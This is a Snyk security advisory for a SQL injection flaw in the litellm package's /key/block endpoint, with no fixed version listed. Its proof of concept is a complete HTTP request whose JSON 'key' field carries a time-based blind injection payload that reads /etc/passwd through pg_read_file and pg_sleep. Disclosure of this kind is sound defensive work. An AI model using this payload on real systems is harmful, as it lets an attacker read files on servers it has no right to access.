SQL Injection Affecting litellm package, versions [1.48.18,]
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PYTHON-LITELLM-10598343
- published4 Jul 2025
- disclosed3 Jul 2025
- creditshadia0
Introduced: 3 Jul 2025
NewCVE-2025-45809 (opens in a new tab)Common Vulnerabilities and Exposures (CVE) are common identifiers for publicly known security vulnerabilities
Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
There is no fixed version for litellm.
Overview
litellm is a Library to easily interface with LLM API providers
Affected versions of this package are vulnerable to SQL Injection via the /key/block endpoint. A proxy_admin_viewer user can retrieve the contents of arbitrary files on the target filesystem by brute forcing them one character at a time.
PoC
POST /key/block HTTP/1.1
Host: 127.0.0.1:4000
Content-Length: 115
Authorization: Bearer sk-5pUqaVXkY6DaR1zEKKnwwA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/json
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"key": "1'|| CASE WHEN pg_read_file('/etc/passwd', 0, 1) = 'r' THEN pg_sleep(10) ELSE pg_sleep(0) END; -- -"
}